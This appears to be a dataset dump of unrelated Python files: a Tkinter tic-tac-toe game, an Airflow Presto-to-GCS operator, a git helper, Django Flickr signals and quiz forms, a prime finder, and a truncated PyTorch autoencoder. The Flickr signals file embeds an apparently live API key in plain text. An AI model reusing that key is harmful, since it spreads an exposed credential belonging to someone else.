False\n\tInMenu = True\n\n\tBackgroundColor = \"#3c3b3d\"\n\tSeparatorColor = \"#252526\"\n\n\tX = \"×\"\n\tO = \"○\"\n\n\tdef __init__(self, root):\n\t\tsuper().__init__(root)\n\t\tself.menu()\n\n\n\tdef computer_turn(self):\n\t\troot.update()\n\t\tif not self.GameOver:\n\t\t\tself.Header.configure(text=\"Thinking...\")\n\t\t\tif self.PCFirst:\n\t\t\t\tplayerFirst = False\n\t\t\telse:\n\t\t\t\tplayerFirst = True\n\t\t\tif self.Player == \"x\":\n\t\t\t\tActualPlayer = \"X\"\n\t\t\telse:\n\t\t\t\tActualPlayer = \"O\"\n\t\t\txy = fn.JarvisManager(self.GameField, ActualPlayer)\n\t\t\tprint(xy, self.Player)\n\t\t\ti = xy[0]\n\t\t\tj = xy[1]\n\t\t\tif self.Player == \"x\":\n\t\t\t\tself.Buttons[i][j].configure(text=self.X)\n\t\t\t\tself.GameField[i][j] = \"X\"\n\t\t\telse:\n\t\t\t\tself.Buttons[i][j].configure(text=self.O, anchor=tk.S)\n\t\t\t\tself.GameField[i][j] = \"O\"\n\t\t\tself.Header.configure(text=\"Your Turn\")\n\n\n\n\n\tdef def_win(self, Buttons):\n\t\tif not self.GameOver:\n\t\t\twinner = fn.CheckForWin(Buttons, self.N)\n\t\t\tif winner == 1:\n\t\t\t\tif self.PCFirst:\n\t\t\t\t\tself.Header.configure(text=\"PC Wins!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\telse:\n\t\t\t\t\tself.Header.configure(text=\"You Win!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\tself.GameOver = True\n\t\t\telif winner == -1:\n\t\t\t\tif self.PCFirst:\n\t\t\t\t\tself.Header.configure(text=\"You Win!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\telse:\n\t\t\t\t\tself.Header.configure(text=\"PC Wins!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\tself.GameOver = True\n\t\tif fn.Is_full(self.GameField) and not self.GameOver:\n\t\t\tself.GameOver = True\n\t\t\tself.Header.configure(text=\"Dead Heat(\")\n\t\t\tself.restart_game()\n\t\t\treturn\n\n\n\n\tdef set_letter(self, Buttons, i, j):\n\t\tif not self.GameOver:\n\t\t\tif Buttons[i][j].cget(\"text\") == \" \" and self.Active:\n\t\t\t\tif self.Player == \"x\":\n\t\t\t\t\tButtons[i][j].configure(text=self.X)\n\t\t\t\t\tself.GameField[i][j] = \"X\"\n\t\t\t\t\tself.def_win(Buttons)\n\t\t\t\t\t\n\t\t\t\t\tself.Player = \"o\"\n\t\t\t\t\tself.Active = False\n\t\t\t\t\tself.computer_turn()\n\t\t\t\t\tself.Active = True\n\t\t\t\t\tself.Player = \"x\"\n\t\t\t\telif self.Player == \"o\":\n\t\t\t\t\tButtons[i][j].configure(text=self.O, anchor=tk.S)\n\t\t\t\t\tself.GameField[i][j] = \"O\"\n\t\t\t\t\tself.def_win(Buttons)\n\t\t\t\t\tself.Player = \"x\"\n\t\t\t\t\tself.Active = False\n\t\t\t\t\tself.computer_turn()\n\t\t\t\t\tself.Active = True\n\t\t\t\t\tself.Player = \"o\"\n\t\t\t\t\t\n\t\t\tself.def_win(Buttons)\n\n\n\tdef restart_game(self):\n\t\tself.Active = False\n\t\tRestartButton = tk.Label(root, fg=\"#464547\", bg=self.SeparatorColor, font=(\"TkDefaultFont\", 20), text=\"Restart\")\n\t\tRestartButton.place(x=75, y=250, width=200, height=50)\n\t\tdef Clear(event):\n\t\t\tif not self.InMenu:\n\t\t\t\tN = self.N\n\t\t\t\tt = 1\n\t\t\t\tfor i in range(N):\n\t\t\t\t\tfor j in range(N):\n\t\t\t\t\t\tself.GameField[i][j] = t\n\t\t\t\t\t\tself.Buttons[i][j].destroy()\n\t\t\t\tself.Player = \"x\"\n\t\t\t\tself.Header = None\n\t\t\t\tself.PCFirst = True\n\t\t\t\tself.GameOver = False\n\t\t\t\tself.GameField = []\n\t\t\t\tself.Buttons = []\n\t\t\t\tself.Active = False\n\t\t\t\tself.MainField.destroy()\n\t\t\t\tRestartButton.configure(bg=self.BackgroundColor, fg=self.BackgroundColor)\n\t\t\t\tself.InMenu = True\n\t\t\t\tself.menu()\n\t\t\t\n\t\tRestartButton.bind(\"\", Clear)\n\n\n\tdef menu(self):\n\t\tself.Header = tk.Label(root, bg=self.BackgroundColor, fg=self.SeparatorColor, font=(\"TkDefaultFont\", 30), text=\"Who is first?\")\n\t\tself.Header.place(x=0, y=0, width=350, height=120)\n\t\tCompF = tk.Label(root, fg=\"#464547\", bg=self.SeparatorColor, font=(\"TkDefaultFont\", 20), text=\"Computer\")\n\t\tUsrF = tk.Label(root, fg=\"#464547\", bg=self.SeparatorColor, font=(\"TkDefaultFont\", 20), text=\"Player\")\n\t\tCompF.place(x=75, y=180, width=200, height=50)\n\t\tUsrF.place(x=75, y=270, width=200, height=50)\n\t\tdef setC(event):\n\t\t\tself.PCFirst = True\n\t\t\tself.Active = False\n\t\t\tself.init_main()\n\t\tdef setU(event):\n\t\t\tself.PCFirst = False\n\t\t\tself.Active = True\n\t\t\tself.init_main()\n\t\tCompF.bind(\"\", setC)\n\t\tUsrF.bind(\"\", setU)\n\n\n\tdef init_main(self):\n\t\tself.InMenu = False\n\t\tN = self.N\n\t\tIndent = self.Indent\n\t\tButtonSize = int((330-Indent*(N-1))/N)\n\t\tself.Header.configure(font=(\"TkDefaultFont\", 40), text=\"Your Turn\")\n\n\t\tself.MainField = tk.Frame(bg=self.SeparatorColor)\n\t\tself.MainField.place(x=10, y=110, width=330, height=330)\n\n\t\tfor i in range(N):\n\t\t\tself.Buttons.append([])\n\t\t\tself.GameField.append([])\n\t\tt = 1\n\t\tfor i in range(N):\n\t\t\tfor j in range(N):\n\t\t\t\tself.GameField[i].append(t)\n\t\t\t\ttemp = tk.Label(self.MainField, bg=self.BackgroundColor, fg=self.SeparatorColor, font=(\"TkDefaultFont\", 76), text=\" \")\n\t\t\t\tself.Buttons[i].append(temp)\n\t\t\t\tX = ButtonSize*i + Indent*i\n\t\t\t\tY = ButtonSize*j + Indent*j\n\t\t\t\tself.Buttons[i][j].place(x=X, y=Y, width=ButtonSize, height=ButtonSize)\n\t\t\t\t#Buttons[i].bind(\"\", lambda x: self.set_letter(Buttons, i))\n\t\t\t\tt += 1\n\n\t\tself.Buttons[0][0].bind(\"\", lambda x: self.set_letter(self.Buttons, 0, 0))\n\t\tself.Buttons[0][1].bind(\"\", lambda x: self.set_letter(self.Buttons, 0, 1))\n\t\tself.Buttons[0][2].bind(\"\", lambda x: self.set_letter(self.Buttons, 0, 2))\n\t\tself.Buttons[1][0].bind(\"\", lambda x: self.set_letter(self.Buttons, 1, 0))\n\t\tself.Buttons[1][1].bind(\"\", lambda x: self.set_letter(self.Buttons, 1, 1))\n\t\tself.Buttons[1][2].bind(\"\", lambda x: self.set_letter(self.Buttons, 1, 2))\n\t\tself.Buttons[2][0].bind(\"\", lambda x: self.set_letter(self.Buttons, 2, 0))\n\t\tself.Buttons[2][1].bind(\"\", lambda x: self.set_letter(self.Buttons, 2, 1))\n\t\tself.Buttons[2][2].bind(\"\", lambda x: self.set_letter(self.Buttons, 2, 2))\n\n\t\tif self.PCFirst:\n\t\t\t#self.Player = \"o\"\n\t\t\tself.Header.configure(text=\"Thinking...\")\n\t\t\tself.computer_turn()\n\t\t\tself.Active = True\n\t\t\tself.Player = \"o\"\n\n\n\t\n\t\t\n\n\n\n\n\t\t\n\n\nroot = tk.Tk()\napp = Main(root)\napp.pack()\nroot.title(\"Крестики нолики\")\nroot.geometry(\"350x450+500+500\")\nroot.configure(background=app.BackgroundColor)\n\n\n\nroot.mainloop()","sub_path":"Python/Tkinter/TickTackToe/Game4.py","file_name":"Game4.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"56821128","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\nfrom __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Any\n\nfrom airflow.providers.google.cloud.transfers.sql_to_gcs import BaseSQLToGCSOperator\nfrom airflow.providers.presto.hooks.presto import PrestoHook\n\nif TYPE_CHECKING:\n from prestodb.client import PrestoResult\n from prestodb.dbapi import Cursor as PrestoCursor\n\n\nclass _PrestoToGCSPrestoCursorAdapter:\n \"\"\"\n An adapter that adds additional feature to the Presto cursor.\n\n The implementation of cursor in the prestodb library is not sufficient.\n The following changes have been made:\n\n * The poke mechanism for row. You can look at the next row without consuming it.\n * The description attribute is available before reading the first row. Thanks to the poke mechanism.\n * the iterator interface has been implemented.\n\n A detailed description of the class methods is available in\n `PEP-249 `__.\n \"\"\"\n\n def __init__(self, cursor: PrestoCursor):\n self.cursor: PrestoCursor = cursor\n self.rows: list[Any] = []\n self.initialized: bool = False\n\n @property\n def description(self) -> list[tuple]:\n \"\"\"\n This read-only attribute is a sequence of 7-item sequences.\n\n Each of these sequences contains information describing one result column:\n\n * ``name``\n * ``type_code``\n * ``display_size``\n * ``internal_size``\n * ``precision``\n * ``scale``\n * ``null_ok``\n\n The first two items (``name`` and ``type_code``) are mandatory, the other\n five are optional and are set to None if no meaningful values can be provided.\n \"\"\"\n if not self.initialized:\n # Peek for first row to load description.\n self.peekone()\n return self.cursor.description\n\n @property\n def rowcount(self) -> int:\n \"\"\"The read-only attribute specifies the number of rows.\"\"\"\n return self.cursor.rowcount\n\n def close(self) -> None:\n \"\"\"Close the cursor now.\"\"\"\n self.cursor.close()\n\n def execute(self, *args, **kwargs) -> PrestoResult:\n \"\"\"Prepare and execute a database operation (query or command).\"\"\"\n self.initialized = False\n self.rows = []\n return self.cursor.execute(*args, **kwargs)\n\n def executemany(self, *args, **kwargs):\n \"\"\"\n Prepare and execute a database operation.\n\n Prepare a database operation (query or command) and then execute it against\n all parameter sequences or mappings found in the sequence seq_of_parameters.\n \"\"\"\n self.initialized = False\n self.rows = []\n return self.cursor.executemany(*args, **kwargs)\n\n def peekone(self) -> Any:\n \"\"\"Return the next row without consuming it.\"\"\"\n self.initialized = True\n element = self.cursor.fetchone()\n self.rows.insert(0, element)\n return element\n\n def fetchone(self) -> Any:\n \"\"\"Fetch the next row of a query result set, returning a single sequence, or ``None``.\"\"\"\n if self.rows:\n return self.rows.pop(0)\n return self.cursor.fetchone()\n\n def fetchmany(self, size=None) -> list:\n \"\"\"\n Fetch the next set of rows of a query result, returning a sequence of sequences.\n\n An empty sequence is returned when no more rows are available.\n \"\"\"\n if size is None:\n size = self.cursor.arraysize\n\n result = []\n for _ in range(size):\n row = self.fetchone()\n if row is None:\n break\n result.append(row)\n\n return result\n\n def __next__(self) -> Any:\n \"\"\"\n Return the next row from the current SQL statement using the same semantics as ``.fetchone()``.\n\n A ``StopIteration`` exception is raised when the result set is exhausted.\n \"\"\"\n result = self.fetchone()\n if result is None:\n raise StopIteration()\n return result\n\n def __iter__(self) -> _PrestoToGCSPrestoCursorAdapter:\n \"\"\"Return self to make cursors compatible to the iteration protocol.\"\"\"\n return self\n\n\nclass PrestoToGCSOperator(BaseSQLToGCSOperator):\n \"\"\"Copy data from PrestoDB to Google Cloud Storage in JSON, CSV or Parquet format.\n\n :param presto_conn_id: Reference to a specific Presto hook.\n \"\"\"\n\n ui_color = \"#a0e08c\"\n\n type_map = {\n \"BOOLEAN\": \"BOOL\",\n \"TINYINT\": \"INT64\",\n \"SMALLINT\": \"INT64\",\n \"INTEGER\": \"INT64\",\n \"BIGINT\": \"INT64\",\n \"REAL\": \"FLOAT64\",\n \"DOUBLE\": \"FLOAT64\",\n \"DECIMAL\": \"NUMERIC\",\n \"VARCHAR\": \"STRING\",\n \"CHAR\": \"STRING\",\n \"VARBINARY\": \"BYTES\",\n \"JSON\": \"STRING\",\n \"DATE\": \"DATE\",\n \"TIME\": \"TIME\",\n # BigQuery don't time with timezone native.\n \"TIME WITH TIME ZONE\": \"STRING\",\n \"TIMESTAMP\": \"TIMESTAMP\",\n # BigQuery supports a narrow range of time zones during import.\n # You should use TIMESTAMP function, if you want have TIMESTAMP type\n \"TIMESTAMP WITH TIME ZONE\": \"STRING\",\n \"IPADDRESS\": \"STRING\",\n \"UUID\": \"STRING\",\n }\n\n def __init__(self, *, presto_conn_id: str = \"presto_default\", **kwargs):\n super().__init__(**kwargs)\n self.presto_conn_id = presto_conn_id\n\n def query(self):\n \"\"\"Queries presto and returns a cursor to the results.\"\"\"\n presto = PrestoHook(presto_conn_id=self.presto_conn_id)\n conn = presto.get_conn()\n cursor = conn.cursor()\n self.log.info(\"Executing: %s\", self.sql)\n cursor.execute(self.sql)\n return _PrestoToGCSPrestoCursorAdapter(cursor)\n\n def field_to_bigquery(self, field) -> dict[str, str]:\n \"\"\"Convert presto field type to BigQuery field type.\"\"\"\n clear_field_type = field[1].upper()\n # remove type argument e.g. DECIMAL(2, 10) => DECIMAL\n clear_field_type, _, _ = clear_field_type.partition(\"(\")\n new_field_type = self.type_map.get(clear_field_type, \"STRING\")\n\n return {\"name\": field[0], \"type\": new_field_type}\n\n def convert_type(self, value, schema_type, **kwargs):\n \"\"\"\n Do nothing. Presto uses JSON on the transport layer, so types are simple.\n\n :param value: Presto column value\n :param schema_type: BigQuery data type\n \"\"\"\n return value\n","sub_path":"airflow/providers/google/cloud/transfers/presto_to_gcs.py","file_name":"presto_to_gcs.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"498890623","text":"\n# Copyright Jamie Allsop 2014-2015\n# Distributed under the Boost Software License, Version 1.0.\n# (See accompanying file LICENSE_1_0.txt or copy at\n# http://www.boost.org/LICENSE_1_0.txt)\n\n#-------------------------------------------------------------------------------\n# Git Source Control Management System\n#-------------------------------------------------------------------------------\n\nimport subprocess\nimport shlex\nimport os\nfrom exceptions import Exception\n\n\nclass GitException(Exception):\n def __init__(self, value):\n self.parameter = value\n def __str__(self):\n return repr(self.parameter)\n\n\ndef info( path ):\n if not path:\n raise GitException(\"No working copy path specified for calling git commands with.\")\n\n url = None\n repository = None\n branch = None\n revision = None\n\n if not os.path.exists( os.path.join( path, \".git\" ) ):\n raise GitException(\"Not a Git working copy\")\n\n try:\n command = \"git describe --always\"\n revision = subprocess.check_output( shlex.split( command ), stderr=subprocess.STDOUT, cwd=path ).strip()\n\n command = \"git symbolic-ref HEAD\"\n branch = subprocess.check_output( shlex.split( command ), stderr=subprocess.STDOUT, cwd=path )\n branch = branch.replace( \"refs/heads/\", \"\" ).strip()\n\n command = \"git config --get remote.origin.url\"\n repository = subprocess.check_output( shlex.split( command ), stderr=subprocess.STDOUT, cwd=path ).strip()\n url = repository\n\n except subprocess.CalledProcessError:\n raise GitException(\"Not a Git working copy\")\n\n return url, repository, branch, revision\n\n","sub_path":"cuppa/scms/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"185581054","text":"from django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom .models import Picture, Make, Lens, Camera\nimport requests\n\nFLICKR_API_URL = 'https://api.flickr.com/services/rest/'\nFLICKR_DISPLAY_PHOTO_URL = 'https://farm{}.staticflickr.com/{}/{}_{}_k.jpg'\n\ndef get_exif_data(picture_id):\n data = {}\n params = {\n 'format': 'json',\n 'nojsoncallback': 1,\n 'photo_id': picture_id,\n 'api_key': 'f665c808bb573b05caf029298373ec9e'\n }\n\n # EXIF\n response = requests.get(FLICKR_API_URL,\n params={**params,**{'method': 'flickr.photos.getExif'}}).json()\n response = response['photo']['exif']\n tags = ['ISO', 'FocalLengthIn35mmFormat', 'FNumber', 'ExposureTime', 'Make', 'Lens', 'Model']\n for tag in tags:\n try:\n data[tag] = [x for x in response if x['tag'] == tag][0]['raw']['_content']\n except:\n data[tag] = None\n # Photo data\n response = requests.get(FLICKR_API_URL,\n params={**params,**{'method': 'flickr.photos.getInfo'}}).json()\n\n response = response['photo']\n data['name'] = response['title']['_content']\n data['url'] = response['urls']['url'][0]['_content']\n # Display sizes\n response = requests.get(FLICKR_API_URL,\n params={**params,**{'method': 'flickr.photos.getSizes'}}).json()\n data['display-url'] = response['sizes']['size'][-2]['source']\n return data\n\n\ndef update_picture_exif(picture):\n data = get_exif_data(picture.flickr_id)\n picture.display_url = data['display-url']\n if False:\n picture.url = data['url']\n picture.aperture = float(data['FNumber']) if data['FNumber'] is not None else None\n picture.focal_length = int(float(data['FocalLengthIn35mmFormat'].split(' ')[0])) if data['FocalLengthIn35mmFormat'] is not None else None\n picture.shutter_speed = data['ExposureTime']\n picture.iso = int(data['ISO']) if data['ISO'] is not None else None\n picture.name = data['name']\n\n if data['Make'] is not None:\n make = data['Make'].lower()\n make = make[0].upper()+make[1:]\n make_already_exist = Make.objects.filter(name=make).exists()\n if not make_already_exist:\n Make.objects.create(name=make)\n make = Make.objects.filter(name=make).first()\n\n if data['Lens'] is not None and picture.lens is None:\n if not Lens.objects.filter(model=data['Lens'], make=make).exists():\n lens = Lens.objects.create(model=data['Lens'], make=make)\n else:\n lens = Lens.objects.filter(model=data['Lens'], make=make).first()\n picture.lens = lens\n\n if data['Model'] is not None and picture.camera is None:\n if not Camera.objects.filter(model=data['Model'], make=make).exists():\n camera = Camera.objects.create(model=data['Model'], make=make)\n else:\n camera = Camera.objects.filter(model=data['Model'], make=make).first()\n picture.camera = camera\n\n post_save.disconnect(save_picture, sender=Picture)\n picture.save()\n post_save.connect(save_picture, sender=Picture)\n\n\n@receiver(post_save, sender=Picture)\ndef create_picture(sender, instance, created, **kwargs):\n if created:\n update_picture_exif(instance)\n\n\n@receiver(post_save, sender=Picture)\ndef save_picture(sender, instance, **kwargs):\n #update_picture_exif(instance)\n pass\n\n\ndef init_signals():\n pass\n","sub_path":"gallery/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"649378598","text":"count = 1;\r\nnum = 1;\r\nprime = 0;\r\nwhile(count < 10001):\r\n\tnum = num + 2;\r\n\tp = True;\r\n\tfor i in range(2, num):\r\n\t\tif(num % i == 0):\r\n\t\t\tp = False;\r\n\t\t\tbreak;\r\n\tif(p == True):\r\n\t\tprime = num;\r\n\t\tcount = count + 1;\r\n\t\tprint(count);\r\nprint(prime);\r\n","sub_path":"10001st prime.py","file_name":"10001st prime.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"460137075","text":"from django import forms\nfrom django.forms.models import inlineformset_factory\nfrom django.forms.widgets import RadioSelect\n\nfrom .models import MCQQuestion, Answer, Quiz\n\n\nclass QuestionForm(forms.Form):\n def __init__(self, question, *args, **kwargs):\n super(QuestionForm, self).__init__(*args, **kwargs)\n choice_list = [x for x in question.get_answers_list()]\n self.fields[\"answers\"] = forms.ChoiceField(choices=choice_list, widget=RadioSelect)\n\n\nMCQFormSet = inlineformset_factory(MCQQuestion,\n Answer,\n fields=['content',\n 'correct'],\n extra=4,\n can_delete=True,\n )\n\n\nclass QuizCreateForm(forms.ModelForm):\n class Meta:\n model = Quiz\n exclude = ['course', 'slug', 'random_order', 'answers_at_end']\n\n\nclass MCQCreateForm(forms.ModelForm):\n class Meta:\n model = MCQQuestion\n exclude = ['course', 'quiz', 'answer_order']\n\n# class AnswerForm(forms.ModelForm):\n# class Meta:\n# model = Answer\n# exclude = ['question']\n#\n","sub_path":"aonebrains_quiz/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"141528946","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: VictorGueorguiev\n\"\"\"\n\n# code inspired by the following tutorial: \n#https://uvadlc-notebooks.readthedocs.io/en/latest/tutorial_notebooks/tutorial9/AE_CIFAR10.html#Building-the-autoencoder\n\n## Standard libraries\nimport os\nimport json\nimport math\nimport numpy as np\n\n## Imports for plotting\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import to_rgb\nimport matplotlib\nmatplotlib.rcParams['lines.linewidth'] = 2.0\nimport seaborn as sns\nsns.reset_orig()\nsns.set()\n\n## Progress bar\nfrom tqdm.notebook import tqdm\n\n## PyTorch\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as data\nimport torch.optim as optim\n# Torchvision\nimport torchvision\nfrom torchvision.datasets import CIFAR10\nfrom torchvision import transforms\n# PyTorch Lightning\nimport pytorch_lightning as pl\n\nfrom pytorch_lightning.callbacks import LearningRateMonitor, ModelCheckpoint\n\n# Tensorboard extension (for visualization purposes later)\nfrom torch.utils.tensorboard import SummaryWriter\n\nclass Encoder(nn.Module):\n\n def __init__(self,\n num_input_channels : int,\n base_channel_size : int,\n latent_dim : int,\n act_fn : object = nn.GELU):\n \"\"\"\n Inputs:\n - num_input_channels : Number of input channels of the image. For CIFAR, this parameter is 3\n - base_channel_size : Number of channels we use in the first convolutional layers. Deeper layers might use a duplicate of it.\n - latent_dim : Dimensionality of latent representation z\n - act_fn : Activation function used throughout the encoder network\n \"\"\"\n super().__init__()\n c_hid = base_channel_size\n self.net = nn.Sequential(\n nn.Conv2d(num_input_channels, c_hid, kernel_size=3, padding=1, stride=2), # 32x32 => 16x16\n act_fn(),\n nn.Conv2d(c_hid, c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.Conv2d(c_hid, 2*c_hid, kernel_size=3, padding=1, stride=2), # 16x16 => 8x8\n act_fn(),\n nn.Conv2d(2*c_hid, 2*c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.Conv2d(2*c_hid, 2*c_hid, kernel_size=3, padding=1, stride=2), # 8x8 => 4x4\n act_fn(),\n nn.Flatten(), # Image grid to single feature vector\n nn.Linear(2*16*c_hid, latent_dim)\n )\n\n def forward(self, x):\n return self.net(x)\n\nclass Decoder(nn.Module):\n\n def __init__(self,\n num_input_channels : int,\n base_channel_size : int,\n latent_dim : int,\n act_fn : object = nn.GELU):\n \"\"\"\n Inputs:\n - num_input_channels : Number of channels of the image to reconstruct. For CIFAR, this parameter is 3\n - base_channel_size : Number of channels we use in the last convolutional layers. Early layers might use a duplicate of it.\n - latent_dim : Dimensionality of latent representation z\n - act_fn : Activation function used throughout the decoder network\n \"\"\"\n super().__init__()\n c_hid = base_channel_size\n self.linear = nn.Sequential(\n nn.Linear(latent_dim, 2*16*c_hid),\n act_fn()\n )\n self.net = nn.Sequential(\n nn.ConvTranspose2d(2*c_hid, 2*c_hid, kernel_size=3, output_padding=1, padding=1, stride=2), # 4x4 => 8x8\n act_fn(),\n nn.Conv2d(2*c_hid, 2*c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.ConvTranspose2d(2*c_hid, c_hid, kernel_size=3, output_padding=1, padding=1, stride=2), # 8x8 => 16x16\n act_fn(),\n nn.Conv2d(c_hid, c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.ConvTranspose2d(c_hid, num_input_channels, kernel_size=3, output_padding=1, padding=1, stride=2), # 16x16 => 32x32\n nn.Tanh() # The input images is scaled between -1 and 1, hence the output has to be bounded as well\n )\n\n def forward(self, x):\n x = self.linear(x)\n x = x.reshape(x.shape[0], -1, 4, 4)\n x = self.net(x)\n return x\n \nclass Autoencoder(pl.LightningModule):\n\n def __init__(self,\n base_channel_size: int,\n latent_dim: int,\n encoder_class : object = Encoder,\n decoder_class : object = Decoder,\n num_input_channels: int = 3,\n width: int = 32,\n height: int = 32):\n super().__init__()\n # Saving hyperparameters of autoencoder\n self.save_hyperparameters()\n # Creating encoder and decoder\n self.encoder = encoder_class(num_input_channels, base_channel_size, latent_dim)\n self.decoder = decoder_class(num_input_channels, base_channel_size, latent_dim)\n # Example input array needed for visualizing the graph of the network\n self.example_input_array = torch.zeros(2, num_input_channels, width, height)\n\n def forward(self, x):\n \"\"\"\n The forward function takes in an image and returns the reconstructed image\n \"\"\"\n z = self.encoder(x)\n x_hat = self.decoder(z)\n return x_hat\n\n def _get_reconstruction_loss(self, batch):\n \"\"\"\n Given a batch of images, this function returns the reconstruction loss (MSE in our case)\n \"\"\"\n x, _ = batch # We do not need the labels\n x_hat = self.forward(x)\n loss = F.mse_loss(x, x_hat, reduction=\"none\")\n loss = loss.sum(dim=[1,2,3]).mean(dim=[0])\n return loss\n\n def configure_optimizers(self):\n optimizer = optim.Adam(self.parameters(), lr=1e-3)\n # Using a scheduler is optional but can be helpful.\n # The scheduler reduces the LR if the validation performance hasn't improved for the last N epochs\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer,\n mode='min',\n factor=0.2,\n patience=20,\n min_lr=5e-5)\n return {\"optimizer\": optimizer, \"lr_scheduler\": scheduler, \"monitor\": \"val_loss\"}\n\n def training_step(self, batch, batch_idx):\n loss = self._get_reconstruction_loss(batch)\n self.log('train_loss', loss)\n return loss\n\n def validation_step(self, batch, batch_idx):\n loss = self._get_reconstruction_loss(batch)\n self.log('val_loss', loss)\n\n def test_step(self, batch, batch_idx):\n loss = self._get_reconstruction_loss(batch)\n self.log('test_loss', loss)\n\nclass GenerateCallback(pl.Callback):\n\n def __init__(self, input_imgs, every_n_epochs=1):\n super().__init__()\n self.input_imgs = input_imgs # Images to reconstruct during training\n self.every_n_epochs = every_n_epochs # Only save those images every N epochs (otherwise tensorboard gets quite large)\n\n def on_epoch_end(self, trainer, pl_module):\n if trainer.current_epoch % self.every_n_epochs == 0:\n # Reconstruct images\n input_imgs = self.input_imgs.to(pl_module.device)\n with torch.no_grad():\n pl_module.eval()\n reconst_imgs = pl_module(input_imgs)\n pl_module.train()\n # Plot and add to tensorboard\n imgs = torch.stack([input_imgs, reconst_imgs], dim=1).flatten(0,1)\n grid = torchvision.utils.make_grid(imgs, nrow=2, normalize=True, range=(-1,1))\n trainer.logger.experiment.add_image(\"Reconstructions\", grid, global_step=trainer.global_step)\n\ndef compare_imgs(img1, img2, title_prefix=\"\"):\n # Calculate MSE loss between both images\n loss = F.mse_loss(img1, img2, reduction=\"sum\")\n # Plot images for visual comparison\n grid = torchvision.utils.make_grid(torch.stack([img1, img2], dim=0), nrow=2, normalize=True, range=(-1,1))\n grid = grid.permute(1, 2, 0)\n plt.figure(figsize=(4,2))\n plt.title(\"%s Loss: %4.2f\" % (title_prefix, loss.item()))\n plt.imshow(grid)\n plt.axis('off')\n plt.show()\n \ndef visualize_reconstructions(model, input_imgs):\n # Reconstruct images\n model.eval()\n with torch.no_grad():\n reconst_imgs = model(input_imgs.to(model.device))\n reconst_imgs = reconst_imgs.cpu()\n\n # Plotting\n imgs = torch.stack([input_imgs, reconst_imgs], dim=1).flatten(0,1)\n grid = torchvision.utils.make_grid(imgs, nrow=4, normalize=True, range=(-1,1))\n grid = grid.permute(1, 2, 0)\n plt.figure(figsize=(7,4.5))\n plt.title(\"Reconstructed from %i latents\" % (model.hparams.latent_dim))\n plt.imshow(grid)\n plt.axis('off')\n plt.show()\n \ndef train_cifar(latent_dim):\n # Create a PyTorch Lightning trainer with the generation callback\n trainer = pl.Trainer(default_root_dir=os.path.join(CHECKPOINT_PATH, \"cifar10_%i\" % latent_dim),\n gpus=1 if str(device).startswith(\"cuda\") else 0,\n max_epochs=500,\n callbacks=[ModelCheckpoint(save_weights_only=True),\n GenerateCallback(get_train_images(8), every_n_epochs=10),\n LearningRateMonitor(\"epoch\")])\n trainer.logger._log_graph = True # If True, we plot the computation graph in tensorboard\n trainer.logger._default_hp_metric = None # Optional logging argument that we don't need\n\n # Check whether pretrained model exists. If yes, load it and skip training\n pretrained_filename = os.path.join(CHECKPOINT_PATH, \"cifar10_%i.ckpt\" % latent_dim)\n if os.path.isfile(pretrained_filename):\n print(\"Found pretrained model, loading...\")\n model = Autoencoder.load_from_checkpoint(pretrained_filename)\n else:\n model = Autoencoder(base_channel_size=32, latent_dim=latent_dim)\n trainer.fit(model, train_loader, val_loader)\n # Test best model on validation and test set\n val_result = trainer.test(model, test_dataloaders=val_loader, verbose=False)\n test_result = trainer.test(model, test_dataloaders=test_loader, verbose=False)\n result = {\"test\": test_result, \"val\": val_result}\n return model, result\n\n# Path to the folder where the datasets are/should be downloaded (e.g. CIFAR10)\nDATASET_PATH = \"../data\"\n# Path to the folder where the pretrained models are saved\nCHECKPOINT_PATH = \"../saved_models/tutorial9\"\n\ndef get_train_images(num):\n return torch.stack([cifar10_dataset[i][0] for i in range(num)], dim=0)\n\n# Transformations applied on each image => only make them a tensor\ntransform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,),(0.5,))])\n\n# Loading the training dataset. We need to split it into a training and validation part\ntrain_dataset = CIFAR10(root=DATASET_PATH, train=True, transform=transform, download=True)\npl.seed_everything(42)\ntrain_set, val_set = torch.utils.data.random_split(train_dataset, [45000, 5000])\n\n# Loading the test set\ntest_set = CIFAR10(root=DATASET_PATH, train=False, transform=transform, download=True)\n\n# We define a set of data loaders that we can use for various purposes later.\ntrain_loader = data.DataLoader(train_set, batch_size=256, shuffle=True, drop_last=True, pin_memory=True, 